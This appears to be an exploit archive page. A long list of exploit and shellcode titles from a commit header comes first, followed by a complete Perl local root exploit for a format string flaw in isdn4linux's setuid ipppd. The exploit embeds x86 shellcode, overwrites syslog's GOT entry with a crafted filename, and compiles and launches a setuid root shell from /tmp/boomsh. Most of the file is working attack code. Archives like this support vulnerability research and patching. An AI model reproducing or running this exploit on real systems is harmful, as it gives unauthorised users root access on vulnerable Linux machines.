880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
102 lines
No EOL
3 KiB
Perl
Executable file
102 lines
No EOL
3 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/5437/info
|
|
|
|
isdn4linux is a freely available, open source package of isdn compatibility tools. It is available for Linux operating systems.
|
|
|
|
isdn4linux contains a format string vulnerability in the ipppd utility. In some installations, this utility is installed with setuid root privileges. Exploitation of this vulnerability could lead to a local attacker executing code with administrative privileges.
|
|
|
|
#!/usr/bin/perl
|
|
|
|
# 7350pippi - x86/Linux ipppd local root
|
|
#
|
|
# (C) COPYRIGHT TESO Security, 2002
|
|
# All Rights Reserved
|
|
#
|
|
# May be used under the terms of the GPL.
|
|
|
|
# ipppd local root exploit:
|
|
# ...
|
|
# /*
|
|
# * Check if there is a device by this name.
|
|
# */
|
|
# if (stat(cp, &statbuf) < 0) {
|
|
# if (errno == ENOENT)
|
|
# return 0;
|
|
# syslog(LOG_ERR, cp);
|
|
# return -1;
|
|
# }
|
|
# ...
|
|
#
|
|
# This exploit changes the address of syslog in ipppd's
|
|
# GOT. Since it returns -1 as seen above, ipppd will invoke
|
|
# syslog() a second time soon this time using the address
|
|
# given by us. We redirect the GOT entry to a stacklocation
|
|
# where the filename of the executed program is normally
|
|
# located. Since we symlink() the shellcode to /usr/sbin/ipppd
|
|
# the shellcode goes on the stack AT A FIXED ADDRESS! Thus
|
|
# we avoid ugly offsets and guessing/bruteforce.
|
|
# If porting this exploits to other systems, you
|
|
# need to find syslogs() GOT entry yourself.
|
|
#
|
|
|
|
use Fcntl;
|
|
|
|
# chown()+chmod() /tmp/boomsh
|
|
$shellcode = "\x90"x100 .
|
|
"\x31\xc0\xb0\x46\xbb\xff\xff\xff\xff\x31\xc9\xcd\x80\xeb".
|
|
"\x2a\x90\x90\x90\x90\x5e\x89\xf3\xff\x03\xff\x43\x04\x31".
|
|
"\xc0\x88\x43\x0b\x31\xc0\xb0\xb6\x31\xc9\x31\xd2\xcd\x80".
|
|
"\x31\xc0\xb0\x0f\x66\xb9\xed\x0d\xcd\x80\x31\xc0\x40\xcd".
|
|
"\x80\xe8\xd5\xff\xff\xff\x2e\x74\x6d\x70\x2e\x62\x6f\x6f".
|
|
"\x6d\x73\x68\x2e";
|
|
|
|
unlink("/tmp/$shellcode");
|
|
symlink("/usr/sbin/ipppd", "/tmp/$shellcode") or die "$!";
|
|
|
|
# my syslog GOT entry @ 0x806c90c
|
|
|
|
sysopen(O, "/tmp/boomsh.c", O_RDWR|O_CREAT, 0600) or die "$!";
|
|
print O<<_EOF_;
|
|
#include <stdio.h>
|
|
int main()
|
|
{
|
|
char *a[] = {"/bin/bash", "--norc", "--noprofile", NULL};
|
|
|
|
setuid(0);
|
|
execve(*a, a, NULL);
|
|
return -1;
|
|
}
|
|
_EOF_
|
|
close O;
|
|
|
|
print "Compiling boomshell ...\n";
|
|
system("cc /tmp/boomsh.c -o /tmp/boomsh");
|
|
|
|
$dir = "/tmp/L";
|
|
mkdir($dir);
|
|
|
|
$ret = 0xbffffffb - length($shellcode)+20;
|
|
printf("Filename is located @ %x\n", $ret);
|
|
|
|
|
|
# maybe need to change to your GOT entry
|
|
# of syslog(); see above
|
|
$file = "XX" . pack(c4, 0x0c, 0xc9, 0x06, 0x08) . "1234" . # GOT
|
|
pack(c4, 0x0d, 0xc9, 0x06, 0x08) . "1234" . # GOT+1
|
|
pack(c4, 0x0e, 0xc9, 0x06, 0x08) . "1234" . # GOT+2
|
|
pack(c4, 0x0f, 0xc9, 0x06, 0x08); # GOT+3
|
|
|
|
$stackpop = "%p"x11;
|
|
$file .= $stackpop;
|
|
|
|
#$file .= "%14d%n%69d%n%40d%n%192d%n";
|
|
|
|
# Should be fixed. If not, find the 4 values for
|
|
# %d yourself using gdb. This worked for me.
|
|
$file .= "%221d%n%158d%n%256d%n%192d%n";
|
|
|
|
open(O, ">$dir/$file") or die "$!";
|
|
close O;
|
|
|
|
system("/tmp/$shellcode", "..$dir/$file/");
|
|
|
|
exec("/tmp/boomsh"); |